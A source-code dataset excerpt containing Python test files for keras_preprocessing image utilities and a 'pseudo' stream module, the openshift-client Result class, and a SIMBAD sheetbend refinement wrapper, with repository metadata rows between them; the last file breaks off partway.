# Test invalid use case
with pytest.raises(ValueError):
x = np.random.random((height, width)) # not 3D
img = utils.array_to_img(x, data_format='channels_first')
with pytest.raises(ValueError):
x = np.random.random((height, width, 3))
# unknown data_format
img = utils.array_to_img(x, data_format='channels')
with pytest.raises(ValueError):
# neither RGB, RGBA, or gray-scale
x = np.random.random((height, width, 5))
img = utils.array_to_img(x, data_format='channels_last')
with pytest.raises(ValueError):
x = np.random.random((height, width, 3))
# unknown data_format
img = utils.img_to_array(x, data_format='channels')
with pytest.raises(ValueError):
# neither RGB, RGBA, or gray-scale
x = np.random.random((height, width, 5, 3))
img = utils.img_to_array(x, data_format='channels_last')
def write_sample_image(tmpdir):
im = utils.array_to_img(np.random.rand(1, 1, 3))
path = str(tmpdir / 'sample_image.png')
utils.save_img(path, im)
return path
def test_image_file_handlers_close(tmpdir):
path = write_sample_image(tmpdir)
max_open_files, _ = resource.getrlimit(resource.RLIMIT_NOFILE)
for i in range(max_open_files+1):
utils.load_img(path)
def test_load_img_returns_image(tmpdir):
path = write_sample_image(tmpdir)
im = utils.load_img(path)
assert isinstance(im, PIL.Image.Image)
if __name__ == '__main__':
pytest.main([__file__])
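As a standalone illustration of the save/load round trip these tests exercise (the file path is arbitrary and the snippet is not part of the test suite):

# Minimal round trip through the utils API exercised above.
import numpy as np
from keras_preprocessing.image import utils

arr = np.random.randint(0, 256, (64, 64, 3)).astype(np.uint8)
utils.save_img('/tmp/example.png', utils.array_to_img(arr, scale=False))

img = utils.load_img('/tmp/example.png', target_size=(32, 32),
                     interpolation='nearest')  # resize while loading
back = utils.img_to_array(img)                 # PIL image -> float32 array
assert back.shape == (32, 32, 3)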
| 41.7625
| 81
| 0.685004
|
import io
import resource
from pathlib import Path
import numpy as np
import PIL
import pytest
from keras_preprocessing.image import utils
def test_validate_filename(tmpdir):
valid_extensions = ('png', 'jpg')
filename = tmpdir.ensure('test.png')
assert utils.validate_filename(str(filename), valid_extensions)
filename = tmpdir.ensure('test.PnG')
assert utils.validate_filename(str(filename), valid_extensions)
filename = tmpdir.ensure('test.some_extension')
assert not utils.validate_filename(str(filename), valid_extensions)
assert not utils.validate_filename('some_test_file.png', valid_extensions)
def test_load_img(tmpdir):
filename_rgb = str(tmpdir / 'rgb_utils.png')
filename_rgba = str(tmpdir / 'rgba_utils.png')
filename_grayscale_8bit = str(tmpdir / 'grayscale_8bit_utils.png')
filename_grayscale_16bit = str(tmpdir / 'grayscale_16bit_utils.tiff')
filename_grayscale_32bit = str(tmpdir / 'grayscale_32bit_utils.tiff')
original_rgb_array = np.array(255 * np.random.rand(100, 100, 3),
dtype=np.uint8)
original_rgb = utils.array_to_img(original_rgb_array, scale=False)
original_rgb.save(filename_rgb)
original_rgba_array = np.array(255 * np.random.rand(100, 100, 4),
dtype=np.uint8)
original_rgba = utils.array_to_img(original_rgba_array, scale=False)
original_rgba.save(filename_rgba)
original_grayscale_8bit_array = np.array(255 * np.random.rand(100, 100, 1),
dtype=np.uint8)
original_grayscale_8bit = utils.array_to_img(original_grayscale_8bit_array,
scale=False)
original_grayscale_8bit.save(filename_grayscale_8bit)
original_grayscale_16bit_array = np.array(
np.random.randint(-2147483648, 2147483647, (100, 100, 1)), dtype=np.int16
)
original_grayscale_16bit = utils.array_to_img(original_grayscale_16bit_array,
scale=False, dtype='int16')
original_grayscale_16bit.save(filename_grayscale_16bit)
original_grayscale_32bit_array = np.array(
np.random.randint(-2147483648, 2147483647, (100, 100, 1)), dtype=np.int32
)
original_grayscale_32bit = utils.array_to_img(original_grayscale_32bit_array,
scale=False, dtype='int32')
original_grayscale_32bit.save(filename_grayscale_32bit)
loaded_im = utils.load_img(filename_rgb)
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_rgb_array.shape
assert np.all(loaded_im_array == original_rgb_array)
loaded_im = utils.load_img(filename_rgba, color_mode='rgba')
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_rgba_array.shape
assert np.all(loaded_im_array == original_rgba_array)
loaded_im = utils.load_img(filename_rgb, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (original_rgb_array.shape[0],
original_rgb_array.shape[1], 1)
loaded_im = utils.load_img(filename_grayscale_8bit, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_grayscale_8bit_array.shape
assert np.all(loaded_im_array == original_grayscale_8bit_array)
loaded_im = utils.load_img(filename_grayscale_16bit, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype='int16')
assert loaded_im_array.shape == original_grayscale_16bit_array.shape
assert np.all(loaded_im_array == original_grayscale_16bit_array)
loaded_im_array = utils.img_to_array(loaded_im)
assert np.allclose(loaded_im_array, original_grayscale_16bit_array)
loaded_im = utils.load_img(filename_grayscale_32bit, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype='int32')
assert loaded_im_array.shape == original_grayscale_32bit_array.shape
assert np.all(loaded_im_array == original_grayscale_32bit_array)
loaded_im_array = utils.img_to_array(loaded_im)
assert np.allclose(loaded_im_array, original_grayscale_32bit_array)
loaded_im = utils.load_img(filename_rgb, target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_rgb_array.shape
assert np.all(loaded_im_array == original_rgb_array)
loaded_im = utils.load_img(filename_rgba, color_mode='rgba',
target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_rgba_array.shape
assert np.all(loaded_im_array == original_rgba_array)
loaded_im = utils.load_img(filename_rgb, color_mode='grayscale',
target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (original_rgba_array.shape[0],
original_rgba_array.shape[1], 1)
loaded_im = utils.load_img(filename_grayscale_8bit, color_mode='grayscale',
target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_grayscale_8bit_array.shape
assert np.all(loaded_im_array == original_grayscale_8bit_array)
loaded_im = utils.load_img(filename_grayscale_16bit, color_mode='grayscale',
target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im, dtype='int16')
assert loaded_im_array.shape == original_grayscale_16bit_array.shape
assert np.all(loaded_im_array == original_grayscale_16bit_array)
loaded_im = utils.load_img(filename_grayscale_32bit, color_mode='grayscale',
target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im, dtype='int32')
assert loaded_im_array.shape == original_grayscale_32bit_array.shape
assert np.all(loaded_im_array == original_grayscale_32bit_array)
loaded_im = utils.load_img(filename_rgb, target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 3)
loaded_im = utils.load_img(filename_rgba, color_mode='rgba',
target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 4)
loaded_im = utils.load_img(filename_rgb, color_mode='grayscale',
target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 1)
loaded_im = utils.load_img(filename_grayscale_8bit, color_mode='grayscale',
target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 1)
loaded_im = utils.load_img(filename_grayscale_16bit, color_mode='grayscale',
target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im, dtype='int16')
assert loaded_im_array.shape == (25, 25, 1)
loaded_im = utils.load_img(filename_grayscale_32bit, color_mode='grayscale',
target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im, dtype='int32')
assert loaded_im_array.shape == (25, 25, 1)
loaded_im_nearest = utils.load_img(filename_rgb, target_size=(25, 25),
interpolation="nearest")
loaded_im_array_nearest = utils.img_to_array(loaded_im_nearest)
assert loaded_im_array_nearest.shape == (25, 25, 3)
assert np.any(loaded_im_array_nearest != loaded_im_array)
loaded_im_nearest = utils.load_img(filename_rgba, color_mode='rgba',
target_size=(25, 25),
interpolation="nearest")
loaded_im_array_nearest = utils.img_to_array(loaded_im_nearest)
assert loaded_im_array_nearest.shape == (25, 25, 4)
assert np.any(loaded_im_array_nearest != loaded_im_array)
loaded_im = utils.load_img(filename_grayscale_8bit, color_mode='grayscale',
target_size=(25, 25), interpolation="nearest")
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 1)
loaded_im = utils.load_img(filename_grayscale_16bit, color_mode='grayscale',
target_size=(25, 25), interpolation="nearest")
loaded_im_array = utils.img_to_array(loaded_im, dtype='int16')
assert loaded_im_array.shape == (25, 25, 1)
loaded_im = utils.load_img(filename_grayscale_32bit, color_mode='grayscale',
target_size=(25, 25), interpolation="nearest")
loaded_im_array = utils.img_to_array(loaded_im, dtype='int32')
assert loaded_im_array.shape == (25, 25, 1)
with open(filename_grayscale_32bit, 'rb') as f:
_path = io.BytesIO(f.read())
loaded_im = utils.load_img(_path, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype=np.int32)
assert np.all(loaded_im_array == original_grayscale_32bit_array)
_path = filename_grayscale_32bit
loaded_im = utils.load_img(_path, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype=np.int32)
assert np.all(loaded_im_array == original_grayscale_32bit_array)
_path = filename_grayscale_32bit.encode()
loaded_im = utils.load_img(_path, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype=np.int32)
assert np.all(loaded_im_array == original_grayscale_32bit_array)
_path = Path(tmpdir / 'grayscale_32bit_utils.tiff')
loaded_im = utils.load_img(_path, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype=np.int32)
assert np.all(loaded_im_array == original_grayscale_32bit_array)
loaded_im = utils.load_img(filename_rgb, interpolation="unsupported")
with pytest.raises(ValueError):
loaded_im = utils.load_img(filename_rgb, target_size=(25, 25),
interpolation="unsupported")
filename_red_square = str(tmpdir / 'red_square_utils.png')
A = np.zeros((50, 100, 3), dtype=np.uint8)
A[20:30, 45:55, 0] = 255
red_square_array = np.array(A)
red_square = utils.array_to_img(red_square_array, scale=False)
red_square.save(filename_red_square)
loaded_im = utils.load_img(filename_red_square, target_size=(25, 25),
keep_aspect_ratio=True)
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 3)
    red_channel_arr = loaded_im_array[:, :, 0].astype(bool)
square_width = np.sum(np.sum(red_channel_arr, axis=0))
square_height = np.sum(np.sum(red_channel_arr, axis=1))
aspect_ratio_result = square_width / square_height
assert aspect_ratio_result == pytest.approx(1.0)
def test_list_pictures(tmpdir):
filenames = ['test.png', 'test0.jpg', 'test-1.jpeg', '2test.bmp',
'2-test.ppm', '3.png', '1.jpeg', 'test.bmp', 'test0.ppm',
'test4.tiff', '5-test.tif', 'test.txt', 'foo.csv',
'face.gif', 'bar.txt']
subdirs = ['', 'subdir1', 'subdir2']
filenames = [tmpdir.ensure(subdir, f) for subdir in subdirs
for f in filenames]
found_images = utils.list_pictures(str(tmpdir))
assert len(found_images) == 33
found_images = utils.list_pictures(str(tmpdir), ext='png')
assert len(found_images) == 6
def test_array_to_img_and_img_to_array():
height, width = 10, 8
x = np.random.random((3, height, width))
img = utils.array_to_img(x, data_format='channels_first')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_first')
assert x.shape == (3, height, width)
x = np.random.random((4, height, width))
img = utils.array_to_img(x, data_format='channels_first')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_first')
assert x.shape == (4, height, width)
x = np.random.random((1, height, width))
img = utils.array_to_img(x, data_format='channels_first')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_first')
assert x.shape == (1, height, width)
x = np.array(
np.random.randint(-2147483648, 2147483647, (1, height, width)),
dtype=np.int32
)
img = utils.array_to_img(x, data_format='channels_first')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_first')
assert x.shape == (1, height, width)
x = np.random.random((height, width, 3))
img = utils.array_to_img(x, data_format='channels_last')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_last')
assert x.shape == (height, width, 3)
x = np.random.random((height, width, 4))
img = utils.array_to_img(x, data_format='channels_last')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_last')
assert x.shape == (height, width, 4)
x = np.random.random((height, width, 1))
img = utils.array_to_img(x, data_format='channels_last')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_last')
assert x.shape == (height, width, 1)
x = np.array(
np.random.randint(-2147483648, 2147483647, (height, width, 1)),
dtype=np.int16
)
img = utils.array_to_img(x, data_format='channels_last')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_last')
assert x.shape == (height, width, 1)
x = np.array(
np.random.randint(-2147483648, 2147483647, (height, width, 1)),
dtype=np.int32
)
img = utils.array_to_img(x, data_format='channels_last')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_last')
assert x.shape == (height, width, 1)
with pytest.raises(ValueError):
x = np.random.random((height, width))
img = utils.array_to_img(x, data_format='channels_first')
with pytest.raises(ValueError):
x = np.random.random((height, width, 3))
img = utils.array_to_img(x, data_format='channels')
with pytest.raises(ValueError):
x = np.random.random((height, width, 5))
img = utils.array_to_img(x, data_format='channels_last')
with pytest.raises(ValueError):
x = np.random.random((height, width, 3))
img = utils.img_to_array(x, data_format='channels')
with pytest.raises(ValueError):
x = np.random.random((height, width, 5, 3))
img = utils.img_to_array(x, data_format='channels_last')
def write_sample_image(tmpdir):
im = utils.array_to_img(np.random.rand(1, 1, 3))
path = str(tmpdir / 'sample_image.png')
utils.save_img(path, im)
return path
def test_image_file_handlers_close(tmpdir):
path = write_sample_image(tmpdir)
max_open_files, _ = resource.getrlimit(resource.RLIMIT_NOFILE)
for i in range(max_open_files+1):
utils.load_img(path)
def test_load_img_returns_image(tmpdir):
path = write_sample_image(tmpdir)
im = utils.load_img(path)
assert isinstance(im, PIL.Image.Image)
if __name__ == '__main__':
pytest.main([__file__])
| true
| true
|
f70b5ab5c5fcfa6cb7faa06d88ce4d7ec1a8cd30
| 1,525
|
py
|
Python
|
tests/stream_test.py
|
pniedzwiedzinski/pseudo
|
b27570bd8400b6a51a2958454b31f1ce2e25c4f9
|
[
"MIT"
] | 5
|
2019-04-02T07:01:34.000Z
|
2019-11-24T02:08:03.000Z
|
tests/stream_test.py
|
pniedzwiedzinski/pseudo
|
b27570bd8400b6a51a2958454b31f1ce2e25c4f9
|
[
"MIT"
] | 11
|
2019-03-20T08:29:30.000Z
|
2019-05-21T11:57:03.000Z
|
tests/stream_test.py
|
pniedzwiedzinski/pseudo
|
b27570bd8400b6a51a2958454b31f1ce2e25c4f9
|
[
"MIT"
] | 1
|
2019-04-02T15:24:40.000Z
|
2019-04-02T15:24:40.000Z
|
"""This module contains unit tests for stream module."""
import pytest
import pseudo
__author__ = "Patryk Niedźwiedziński"
@pytest.fixture
def stream():
"""Returns stream object"""
def _s(i):
s = pseudo.stream.Stream(i)
return s
return _s
@pytest.mark.timeout(2)
def test_get_current_line(stream, test):
s = stream("a\nb")
test(s.get_current_line(), "a")
s.line += 1
test(s.get_current_line(), "b")
@pytest.mark.timeout(2)
def test_next_line(stream):
"""Checks Stream.next_line"""
s = stream("1\n2")
s.next_line()
if "2" != s.peek():
print(s.peek())
raise AssertionError
@pytest.mark.timeout(2)
def test_next(stream):
"""Checks Stream.next"""
s = stream("1\n")
if "1" != s.next():
print(s.next())
raise AssertionError
@pytest.mark.timeout(2)
def test_eol(stream):
"""Checks Stream.eol"""
s = stream("\n1\n")
if not s.eol():
raise AssertionError
s.next_line()
if s.eol():
raise AssertionError
s.next()
if not s.eol():
raise AssertionError
@pytest.mark.timeout(2)
def test_eof(stream):
"""Checks Stream.eof"""
s = stream("1")
if s.eof():
raise AssertionError
s.next()
if not s.eof():
raise AssertionError
@pytest.mark.timeout(2)
def test_throw(stream):
"""Checks Stream.throw"""
s = stream("test")
try:
s.throw("Error")
except SystemExit:
pass
else:
raise AssertionError
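From the assertions above one can infer the shape of the Stream API; the hedged sketch below mirrors the tests' own call sequence, though the exact character-versus-token semantics are not guaranteed by these tests alone.

# Sketch inferred from the tests: Stream exposes a cursor over the input.
from pseudo.stream import Stream

s = Stream("1\n2")
assert not s.eof()       # input remains
s.next_line()            # advance to the next line
assert s.peek() == "2"   # look ahead without consuming
assert s.next() == "2"   # consume the current character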
| 18.154762
| 56
| 0.591475
|
import pytest
import pseudo
__author__ = "Patryk Niedźwiedziński"
@pytest.fixture
def stream():
def _s(i):
s = pseudo.stream.Stream(i)
return s
return _s
@pytest.mark.timeout(2)
def test_get_current_line(stream, test):
s = stream("a\nb")
test(s.get_current_line(), "a")
s.line += 1
test(s.get_current_line(), "b")
@pytest.mark.timeout(2)
def test_next_line(stream):
s = stream("1\n2")
s.next_line()
if "2" != s.peek():
print(s.peek())
raise AssertionError
@pytest.mark.timeout(2)
def test_next(stream):
s = stream("1\n")
if "1" != s.next():
print(s.next())
raise AssertionError
@pytest.mark.timeout(2)
def test_eol(stream):
s = stream("\n1\n")
if not s.eol():
raise AssertionError
s.next_line()
if s.eol():
raise AssertionError
s.next()
if not s.eol():
raise AssertionError
@pytest.mark.timeout(2)
def test_eof(stream):
s = stream("1")
if s.eof():
raise AssertionError
s.next()
if not s.eof():
raise AssertionError
@pytest.mark.timeout(2)
def test_throw(stream):
s = stream("test")
try:
s.throw("Error")
except SystemExit:
pass
else:
raise AssertionError
| true
| true
|
f70b5ae82ddf77d29a0ee10d330906455aea832b
| 3,360
|
py
|
Python
|
packages/openshift/result.py
|
mhcurlee/openshift-client-python
|
f8013715d51afcd51c5ab8dd95ee0e2f9f21bb15
|
[
"Apache-2.0"
] | 41
|
2019-04-12T21:07:02.000Z
|
2022-02-21T20:01:18.000Z
|
packages/openshift/result.py
|
mhcurlee/openshift-client-python
|
f8013715d51afcd51c5ab8dd95ee0e2f9f21bb15
|
[
"Apache-2.0"
] | 27
|
2019-07-11T21:26:27.000Z
|
2021-11-29T17:28:42.000Z
|
packages/openshift/result.py
|
mhcurlee/openshift-client-python
|
f8013715d51afcd51c5ab8dd95ee0e2f9f21bb15
|
[
"Apache-2.0"
] | 33
|
2019-04-10T17:37:01.000Z
|
2022-03-08T01:05:45.000Z
|
from __future__ import absolute_import
import json
from .model import OpenShiftPythonException
class Result(object):
def __init__(self, high_level_operation, tracking_limit=None):
self.high_level_operation = high_level_operation
self.__actions = []
        # a negative (or None) tracking_limit means unlimited action tracking
if tracking_limit is not None and tracking_limit >= 0:
self.limit_tracking_actions = tracking_limit
else:
self.limit_tracking_actions = None
def actions(self):
my_list = [a for a in self.__actions if not a.internal]
return my_list
# Returns a bitwise OR of all underlying action statuses (if 0, all actions returned 0)
def status(self):
s = 0
for action in self.__actions:
            # If this was not the last attempt, its return status does not matter; errors are ignored.
if action.last_attempt:
s |= int(action.status)
return s
# Returns aggregate stdout from all underlying actions
def out(self):
s = u''
for action in self.__actions:
if action.out:
s += action.out
if not s.endswith("\n"):
s += u'\n'
return s
def get_timeout(self):
"""
:return: Iterates through all actions in this Result and returns the first Action object
it finds that indicates it timed out. If no action timed out, returns None.
"""
for action in self.__actions:
if action.timeout:
return action
return None
# Returns aggregate stderr from all underlying actions
def err(self):
s = u''
for action in self.__actions:
if action.err:
s += action.err
if not s.endswith("\n"):
s += u'\n'
return s
def as_dict(self, truncate_stdout=-1, redact_tokens=True, redact_streams=True, redact_references=True):
m = {
"operation": self.high_level_operation,
"status": self.status(),
"actions": [action.as_dict(truncate_stdout=truncate_stdout, redact_tokens=redact_tokens,
redact_references=redact_references,
redact_streams=redact_streams) for action in self.__actions]
}
return m
def as_json(self, indent=4, truncate_stdout=-1, redact_tokens=True, redact_streams=True, redact_references=True):
return json.dumps(
self.as_dict(truncate_stdout=truncate_stdout, redact_tokens=redact_tokens,
redact_references=redact_references, redact_streams=redact_streams),
indent=indent)
def add_action(self, action):
self.__actions.append(action)
if self.limit_tracking_actions is not None and len(self.__actions) > self.limit_tracking_actions:
self.__actions.pop(0)
def add_result(self, result):
self.__actions.extend(result.__actions)
def __repr__(self):
return self.as_json()
def fail_if(self, msg):
if self.get_timeout():
msg += " (Timeout during: {})".format(self.get_timeout().as_dict()['cmd'])
if self.status() != 0:
raise OpenShiftPythonException(msg, self)
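To make the expected call pattern concrete, here is a hedged sketch; `RecordedAction` is a hypothetical stand-in for the library's internal Action type, exposing only the attributes Result reads above (internal, last_attempt, timeout, status, out, err, as_dict) — openshift-client-python normally constructs these objects itself.

# Hypothetical stand-in for the library's Action type (not the real class).
class RecordedAction:
    def __init__(self, status, out='', err=''):
        self.internal = False      # include in actions()
        self.last_attempt = True   # count toward status()
        self.timeout = None        # no timeout occurred
        self.status = status
        self.out = out
        self.err = err

    def as_dict(self, **kwargs):
        return {'cmd': 'oc get pods', 'status': self.status}

result = Result('get pods', tracking_limit=10)
result.add_action(RecordedAction(0, out='pod-a Running'))
assert result.status() == 0           # all tracked actions succeeded
result.fail_if('oc get pods failed')  # raises OpenShiftPythonException on nonzero status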
| 35
| 117
| 0.609821
|
from __future__ import absolute_import
import json
from .model import OpenShiftPythonException
class Result(object):
def __init__(self, high_level_operation, tracking_limit=None):
self.high_level_operation = high_level_operation
self.__actions = []
if tracking_limit is not None and tracking_limit >= 0:
self.limit_tracking_actions = tracking_limit
else:
self.limit_tracking_actions = None
def actions(self):
my_list = [a for a in self.__actions if not a.internal]
return my_list
def status(self):
s = 0
for action in self.__actions:
if action.last_attempt:
s |= int(action.status)
return s
def out(self):
s = u''
for action in self.__actions:
if action.out:
s += action.out
if not s.endswith("\n"):
s += u'\n'
return s
def get_timeout(self):
for action in self.__actions:
if action.timeout:
return action
return None
def err(self):
s = u''
for action in self.__actions:
if action.err:
s += action.err
if not s.endswith("\n"):
s += u'\n'
return s
def as_dict(self, truncate_stdout=-1, redact_tokens=True, redact_streams=True, redact_references=True):
m = {
"operation": self.high_level_operation,
"status": self.status(),
"actions": [action.as_dict(truncate_stdout=truncate_stdout, redact_tokens=redact_tokens,
redact_references=redact_references,
redact_streams=redact_streams) for action in self.__actions]
}
return m
def as_json(self, indent=4, truncate_stdout=-1, redact_tokens=True, redact_streams=True, redact_references=True):
return json.dumps(
self.as_dict(truncate_stdout=truncate_stdout, redact_tokens=redact_tokens,
redact_references=redact_references, redact_streams=redact_streams),
indent=indent)
def add_action(self, action):
self.__actions.append(action)
if self.limit_tracking_actions is not None and len(self.__actions) > self.limit_tracking_actions:
self.__actions.pop(0)
def add_result(self, result):
self.__actions.extend(result.__actions)
def __repr__(self):
return self.as_json()
def fail_if(self, msg):
if self.get_timeout():
msg += " (Timeout during: {})".format(self.get_timeout().as_dict()['cmd'])
if self.status() != 0:
raise OpenShiftPythonException(msg, self)
| true
| true
|
f70b5b13da8974a7a5b30eaef4bc634bbeef2ad0
| 5,029
|
py
|
Python
|
simbad/mr/sheetbend_refine.py
|
hlasimpk/SIMPLE
|
89570f1a29e2871cb1e85cfda36cfa22fbad0877
|
[
"BSD-3-Clause"
] | 2
|
2017-02-14T15:31:30.000Z
|
2019-07-20T12:30:59.000Z
|
simbad/mr/sheetbend_refine.py
|
hlasimpk/SIMPLE
|
89570f1a29e2871cb1e85cfda36cfa22fbad0877
|
[
"BSD-3-Clause"
] | 65
|
2017-02-14T14:19:28.000Z
|
2021-09-21T09:50:02.000Z
|
simbad/mr/sheetbend_refine.py
|
hlasimpk/SIMPLE
|
89570f1a29e2871cb1e85cfda36cfa22fbad0877
|
[
"BSD-3-Clause"
] | 7
|
2017-05-09T15:27:08.000Z
|
2021-06-13T13:32:40.000Z
|
#!/usr/bin/env ccp4-python
"""Module to run sheetbend on a model"""
__author__ = "Adam Simpkin"
__date__ = "05 Aug 2018"
__version__ = "1.0"
import os
from simbad.util import mtz_util
from simbad.mr.refmac_refine import Refmac
from pyjob import cexec
class SheetBend(object):
"""Class to run sheetbend"""
def __init__(self, hklin, hklout, logfile, pdbin, pdbout, work_dir):
self._hklin = None
self._hklout = None
self._logfile = None
self._pdbin = None
self._pdbout = None
self._work_dir = None
# Temporary path for testing
self.exe = "/data1/opt/devtoolsTrunk/install/bin/csheetbend"
self.hklin = hklin
self.hklout = hklout
self.logfile = logfile
self.pdbin = pdbin
self.pdbout = pdbout
self.work_dir = work_dir
self.check_sheetbend_exe()
@property
def hklin(self):
"""The input hkl file"""
return self._hklin
@hklin.setter
def hklin(self, hklin):
"""Define the input hkl file"""
self._hklin = hklin
@property
def hklout(self):
"""The output hkl file"""
return self._hklout
@hklout.setter
def hklout(self, hklout):
"""Define the output hkl file"""
self._hklout = hklout
@property
def logfile(self):
"""The logfile output"""
return self._logfile
@logfile.setter
def logfile(self, logfile):
"""Define the output logfile"""
self._logfile = logfile
@property
def pdbin(self):
"""The input pdb file"""
return self._pdbin
@pdbin.setter
def pdbin(self, pdbin):
"""Define the input pdb file"""
self._pdbin = pdbin
@property
def pdbout(self):
"""The output pdb file"""
return self._pdbout
@pdbout.setter
def pdbout(self, pdbout):
"""Define the output pdb file"""
self._pdbout = pdbout
@property
def work_dir(self):
"""The path to the working directory"""
return self._work_dir
@work_dir.setter
def work_dir(self, work_dir):
"""Define the working directory"""
self._work_dir = work_dir
def check_sheetbend_exe(self):
if not os.path.isfile(self.exe):
msg = "Sheetbend executable {0} not found".format(self.exe)
raise RuntimeError(msg)
def run(self, ncyc=100):
# Make a note of the current working directory
current_work_dir = os.getcwd()
# Change to the sheetbend working directory
if os.path.exists(self.work_dir):
os.chdir(self.work_dir)
else:
os.makedirs(self.work_dir)
os.chdir(self.work_dir)
tmp_pdb = os.path.join(self.work_dir, "sheetbend.pdb")
SheetBend.sheetbend(self.exe, self.hklin, self.pdbin, tmp_pdb, ncyc, self.logfile)
# Perform a cycle of Refmac to get output hkl
key = "ncyc 10"
Refmac.refmac(self.hklin, self.hklout, tmp_pdb, self.pdbout, self.logfile, key)
# Return to original working directory
os.chdir(current_work_dir)
@staticmethod
def sheetbend(exe, hklin, pdbin, pdbout, ncyc, logfile):
"""Function to run refinement using sheetbend
Parameters
----------
exe : str
    Path to the sheetbend executable
hklin : str
Path to the input hkl file
pdbin : str
Path to the input pdb
pdbout : str
Path to the output pdb
ncyc : int
Number of cycles to run
logfile : str
Path to the output log
Returns
-------
file
Output pdb file
file
Output log file
"""
mtz_labels = mtz_util.GetLabels(hklin)
colin = "{0},{1}".format(mtz_labels.f, mtz_labels.sigf)
cmd = [exe, "--pdbin", pdbin, "--mtzin", hklin, "--pdbout", pdbout, "--colin-fo", colin, "-cycles", str(ncyc), "-resolution-by-cycle", "6,3"]
stdout = cexec(cmd)
with open(logfile, "w") as f_out:
f_out.write(stdout)
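# Illustrative note (an assumption, not from the original source): with
# hklin="data.mtz", pdbin="in.pdb", pdbout="out.pdb", ncyc=12 and MTZ
# amplitude/sigma labels FP/SIGFP, the command assembled above is roughly:
#
#   csheetbend --pdbin in.pdb --mtzin data.mtz --pdbout out.pdb \
#       --colin-fo FP,SIGFP -cycles 12 -resolution-by-cycle 6,3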
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Runs refinement using sheetbend", prefix_chars="-")
group = parser.add_argument_group()
group.add_argument("-hklin", type=str, help="Path to the input hkl file")
group.add_argument("-hklout", type=str, help="Path to the output hkl file")
group.add_argument("-logfile", type=str, help="Path to the output log file")
group.add_argument("-ncyc", type=int, default=12, help="Number of cycles of refinement to run")
group.add_argument("-pdbin", type=str, help="Path to the input pdb file")
group.add_argument("-pdbout", type=str, help="Path to the output pdb file")
group.add_argument("-work_dir", type=str, help="Path to the working directory")
args = parser.parse_args()
sheetbend = SheetBend(args.hklin, args.hklout, args.logfile, args.pdbin, args.pdbout, args.work_dir)
sheetbend.run(args.ncyc)
| 28.737143
| 149
| 0.608471
|
__author__ = "Adam Simpkin"
__date__ = "05 Aug 2018"
__version__ = "1.0"
import os
from simbad.util import mtz_util
from simbad.mr.refmac_refine import Refmac
from pyjob import cexec
class SheetBend(object):
def __init__(self, hklin, hklout, logfile, pdbin, pdbout, work_dir):
self._hklin = None
self._hklout = None
self._logfile = None
self._pdbin = None
self._pdbout = None
self._work_dir = None
self.exe = "/data1/opt/devtoolsTrunk/install/bin/csheetbend"
self.hklin = hklin
self.hklout = hklout
self.logfile = logfile
self.pdbin = pdbin
self.pdbout = pdbout
self.work_dir = work_dir
self.check_sheetbend_exe()
@property
def hklin(self):
return self._hklin
@hklin.setter
def hklin(self, hklin):
self._hklin = hklin
@property
def hklout(self):
return self._hklout
@hklout.setter
def hklout(self, hklout):
self._hklout = hklout
@property
def logfile(self):
return self._logfile
@logfile.setter
def logfile(self, logfile):
self._logfile = logfile
@property
def pdbin(self):
return self._pdbin
@pdbin.setter
def pdbin(self, pdbin):
self._pdbin = pdbin
@property
def pdbout(self):
return self._pdbout
@pdbout.setter
def pdbout(self, pdbout):
self._pdbout = pdbout
@property
def work_dir(self):
return self._work_dir
@work_dir.setter
def work_dir(self, work_dir):
self._work_dir = work_dir
def check_sheetbend_exe(self):
if not os.path.isfile(self.exe):
msg = "Sheetbend executable {0} not found".format(self.exe)
raise RuntimeError(msg)
def run(self, ncyc=100):
current_work_dir = os.getcwd()
if os.path.exists(self.work_dir):
os.chdir(self.work_dir)
else:
os.makedirs(self.work_dir)
os.chdir(self.work_dir)
tmp_pdb = os.path.join(self.work_dir, "sheetbend.pdb")
SheetBend.sheetbend(self.exe, self.hklin, self.pdbin, tmp_pdb, ncyc, self.logfile)
key = "ncyc 10"
Refmac.refmac(self.hklin, self.hklout, tmp_pdb, self.pdbout, self.logfile, key)
os.chdir(current_work_dir)
@staticmethod
